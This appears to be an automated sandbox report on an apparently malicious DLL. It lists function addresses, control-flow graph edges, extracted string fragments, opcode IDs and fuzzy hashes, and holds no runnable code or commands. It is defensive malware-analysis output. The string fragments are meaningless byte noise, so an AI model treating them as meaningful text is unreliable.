                                                                    Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 262 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->262 263 18000cca0-18000cca5 256->263 290 18000cfb4-18000d00a call 1800194a4 257->290 264 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->264 265 18000c64e-18000c653 258->265 293 18000cc28-18000cc85 call 1800194a4 259->293 304 18000cedc-18000cf26 call 1800194a4 262->304 266 18000cd35-18000cdce call 18000703c call 18001c32c 263->266 267 18000ccab-18000ccb0 263->267 264->253 269 18000c9c1-18000ca52 call 18002870c call 18001c32c 265->269 270 18000c659-18000c65e 265->270 309 18000cdd3-18000ce2e call 1800194a4 266->309 274 18000ccb6-18000cd30 call 180021434 267->274 275 18000d00f-18000d014 267->275 312 18000ca57-18000caa0 call 1800194a4 269->312 277 18000c664-18000c669 270->277 278 18000c8bb-18000c963 call 180002610 call 18001c32c 270->278 274->253 275->253 291 18000d01a-18000d020 275->291 286 18000c7b2-18000c85a call 180019618 call 18001c32c 277->286 287 18000c66f-18000c674 277->287 317 18000c968-18000c9bc call 1800194a4 278->317 324 18000c85f-18000c8b6 call 1800194a4 286->324 287->275 297 18000c67a-18000c73d call 180002178 call 18001c32c 287->297 290->275 293->253 326 18000c742-18000c7ad call 1800194a4 297->326 304->253 309->253 312->253 317->253 324->253 326->253
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +#;)$K'$sf$w\H
                                                                    • API String ID: 0-1051058546
                                                                    • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                    • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <4P$<8$<w.
                                                                    • API String ID: 0-1030867500
                                                                    • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                    • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180009100 Relevance: .1, Instructions: 125COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                    • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                    • API String ID: 0-2447245168
                                                                    • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                    • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 581 1800061ab-1800061b0 570->581 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 577 180005a25-180005a2a 572->577 578 180005da6-180005fb1 call 1800093f0 572->578 573->569 579 1800061bb-18000625a call 180001b1c 577->579 580 180005a30-180005a35 577->580 593 180005fc3-180005fc8 578->593 594 180005fb3-180005fbe 578->594 587 18000625f-180006271 579->587 584 180005a3b-180005a40 580->584 585 180005d7e-180005d8c 580->585 586 1800061b6 581->586 581->587 590 180005a46-180005a4b 584->590 591 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 584->591 592 180005d92-180005d96 585->592 586->569 595 180005a51-180005a56 590->595 596 180005ad8-180005b68 call 18000abac 590->596 591->569 597 180005d98-180005da1 592->597 598 180005d8e-180005d8f 592->598 593->569 594->569 595->581 600 180005a5c-180005ad3 call 180007958 595->600 596->587 607 180005b6e-180005b73 596->607 597->569 598->592 600->569 607->569
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                    • API String ID: 0-2100131636
                                                                    • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                    • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                    • API String ID: 0-2401169580
                                                                    • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                    • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )#?$EX.$PT$UbA$2f
                                                                    • API String ID: 0-1318892062
                                                                    • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                    • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $T$?F$QP|m$qjf$tZp
                                                                    • API String ID: 0-3477398917
                                                                    • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                    • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JQ$k&($t$v$x\J
                                                                    • API String ID: 0-1134872184
                                                                    • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                    • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: R$)H8$?rIc$L==$V
                                                                    • API String ID: 0-2512384441
                                                                    • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                    • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Qq$bt$vird$+$S
                                                                    • API String ID: 0-3373980505
                                                                    • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                    • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: V$@$P9$^_"
                                                                    • API String ID: 0-1880944046
                                                                    • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                    • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$'Xsa$iJ6$vG
                                                                    • API String ID: 0-746338152
                                                                    • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                    • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *i^$MIC$-Z$]2
                                                                    • API String ID: 0-498664264
                                                                    • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                    • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B$EG$QsF$_
                                                                    • API String ID: 0-784369960
                                                                    • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                    • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -`G$.$5B.Y$Z`35
                                                                    • API String ID: 0-1363032466
                                                                    • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                    • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *+_$WSh$\O$#o
                                                                    • API String ID: 0-1846314129
                                                                    • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                    • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .B$O$M*K$\<
                                                                    • API String ID: 0-3225238681
                                                                    • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                    • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$xVO$~O
                                                                    • API String ID: 0-3655128719
                                                                    • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                    • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,IW$G$JMg$l
                                                                    • API String ID: 0-1370644289
                                                                    • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                    • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180018AB4 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,$,$2S=$i`}G
                                                                    • API String ID: 0-4285990414
